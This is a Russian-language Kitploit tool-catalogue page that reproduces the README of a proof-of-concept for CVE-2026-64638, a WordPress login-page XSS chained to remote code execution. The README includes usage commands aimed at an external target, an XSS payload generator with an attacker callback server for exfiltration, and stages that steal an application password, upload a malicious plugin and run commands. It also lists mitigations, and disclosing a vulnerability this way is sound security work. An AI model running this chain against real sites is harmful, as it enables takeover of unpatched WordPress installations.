Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Инструменты/GitHubGitHub/imbas007/cve-2026-64638-poc
Сканеры веб-уязвимостейГенерация полезной нагрузкиЭксплуатацияЭксплуатация веб-приложенийСбор информацииТестирование на ПроникновениеRed Teaming
GitHubimbas007/cve-2026-64638-poc

CVE-2026-64638-POC

CVE-2026-64638: WordPress XSS до аутентификации → RCE (XSS2Shell) PoC

РепозиторийСайт
92101 месяц назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2026-64638 — XSS2Shell

Предварительно аутентифицированный отражённый XSS → удалённое выполнение кода в ядре WordPress

License WordPress CVE

⚠️ ОТКАЗ ОТ ОТВЕТСТВЕННОСТИ: Данный репозиторий предназначен только для авторизованных исследований в области безопасности и образовательных целей. Не используйте его против систем, которыми вы не владеете или на тестирование которых у вас нет явного письменного разрешения. Несанкционированный доступ незаконен. См. SECURITY.md.


Обзор

CVE-2026-64638 — это предварительно аутентифицированный отражённый XSS в конвейере обработки входа в систему / wplogin ядра WordPress. Уязвимость вызвана различием в работе парсеров: некорректный ввод переживает strip_tags() в PHP, но позже реконструируется как HTML функцией wp_kses_post(), что позволяет подконтрольному атакующему разметке достичь DOM.

Исследователи из pwn.ai продемонстрировали XSS2Shell — цепочку, которая повышает этот XSS до полного выполнения PHP-кода в стандартной установке WordPress, когда аутентифицированный администратор взаимодействует с подконтрольным атакующему контентом.

СвойствоЗначение
CVECVE-2026-64638
CVSS8.9
ТипОтражённый XSS → цепочка до RCE
КомпонентСтраница входа ядра WordPress
ЗатронутыWordPress < 7.0.3 (бэкпорты до 4.7)
ИсправленоWordPress 7.0.3 (6 августа 2026 года)
Корневая причинаРазличие парсеров: strip_tags() против wp_kses_post()

Быстрый старт (Docker)

root@kitploit:~
git clone https://github.com/<your>/CVE-2026-64638-POC.git
cd CVE-2026-64638-POC

# One command — spin up vulnerable WordPress 7.0.2 + run full chain
./test.sh up
./test.sh chain

Что происходит:

root@kitploit:~
[СТАДИЯ 1] WordPress 7.0.2 → УЯЗВИМ
[СТАДИЯ 2] Сгенерирован URL с XSS-пейлоадом
[СТАДИЯ 3] Создан пароль приложения
[СТАДИЯ 4] Плагин загружен и активирован
[СТАДИЯ 5] RCE → uid=33(www-data)

Все команды

root@kitploit:~
./test.sh up         # Запуск Docker + установка WordPress (admin/admin123)
./test.sh scan       # Определение версии и статуса исправления
./test.sh chain      # Запуск полной цепочки XSS2Shell RCE
./test.sh all        # up + scan + chain (всё в одном)
./test.sh down       # Остановка контейнеров
./test.sh clean      # Остановка + удаление всех томов

# Или через Make
make up              # Запуск Docker
make install         # Установка WordPress
make scan            # Проверка уязвимости
make gen-xss         # Генерация URL с XSS-пейлоадом
make test-chain      # Полная цепочка RCE
make serve           # Запуск callback-сервера на :8080
make down            # Остановка контейнеров

Структура репозитория

root@kitploit:~
CVE-2026-64638-POC/
├── README.md
├── SECURITY.md              # Политика безопасности и отказ от ответственности
├── docker-compose.yml        # WordPress 7.0.2 + MySQL 8 + WP-CLI
├── Makefile                  # Команды-сокращения
├── test.sh                   # Автоматизированный набор тестов
├── requirements.txt          # Python-зависимости
│
├── xss2shell_chain.py       # [ГЛАВНЫЙ] Полная цепочка: scan → XSS → app-password → plugin → RCE
├── xss2shell_scanner.py     # Определение версии + тест отражения имени пользователя
├── xss2shell_checker.py     # Лёгкий проверщик исправлений (безопасный, без эксплуатирования)
├── exploit_server.py        # Callback-сервер для эксфильтрации XSS
├── xss_payload.html         # Интерактивный PoC XSS (браузер)
│
└── docs/
    ├── CHAIN.md             # Технический разбор всех 7 стадий цепочки
    ├── MITIGATION.md        # Рекомендации по защите + правила обнаружения
    └── PAYLOAD_NOTES.md     # Заметки о пейлоаде, специфичном для обхода CVE

Ручное использование (внешняя цель)

root@kitploit:~
python3 -m venv .venv && source .venv/bin/activate
pip install -r requirements.txt

# Сканирование цели
python3 xss2shell_chain.py scan -u https://target.example.com

# Генерация XSS-пейлоада
python3 xss2shell_chain.py gen-xss -u https://target.example.com -c http://your-ip:8080

# Полная цепочка (требуются учётные данные администратора WordPress)
python3 xss2shell_chain.py chain \
    -u https://target.example.com \
    --user admin --pass "password" \
    --cmd "id"

# Отдельные стадии
python3 xss2shell_chain.py stage-apppass -u URL --user U --pass P
python3 xss2shell_chain.py stage-plugin -u URL --apppass "PASS"
python3 xss2shell_chain.py stage-rce -u URL --cmd "whoami"

Цепочка атаки XSS2Shell

Полные подробности см. в docs/CHAIN.md.

root@kitploit:~
┌─────────────────────────────────────────────────────────────────┐
│  1. Отражённый XSS на wp-login.php (страница ошибки входа)     │
│  2. DOM-клобберинг для управления контекстом страницы          │
│  3. JSONP / Same-Origin Method Execution (SOME)                 │
│  4. Создание пароля приложения через REST API                   │
│  5. Доступ к REST API с украденным паролем приложения           │
│  6. Загрузка вредоносного плагина/темы                          │
│  7. Выполнение PHP-кода → полный RCE                            │
└─────────────────────────────────────────────────────────────────┘

Примечание: стадии 3–7 требуют, чтобы вошедший в систему администратор взаимодействовал с XSS-пейлоадом. Уязвимость существует до аутентификации, но полная цепочка RCE для завершения требует доступа уровня администратора.


Смягчение последствий

  1. Немедленно обновите WordPress до версии 7.0.3 или новее
  2. Включите автоматические фоновые обновления
  3. Проведите аудит паролей приложений (Пользователи → Профиль)
  4. Проверьте журналы на предмет подозрительных имён пользователей при неудачных входах
  5. Отслеживайте активность загрузки плагинов/тем

Подробные рекомендации по усилению защиты и правила обнаружения см. в docs/MITIGATION.md.


Ссылки

  • Релиз безопасности WordPress 7.0.3
  • Блог pwn.ai: XSS2Shell
  • Разбор pwn.ai: SOME/обход CSP
  • Освещение в The Hacker News
  • Статья The CyberSec Guru
  • Запись CVE

Автор

Исследование безопасности и PoC. Только для образовательных целей.

Лицензия

MIT — см. LICENSE

Скачать инструмент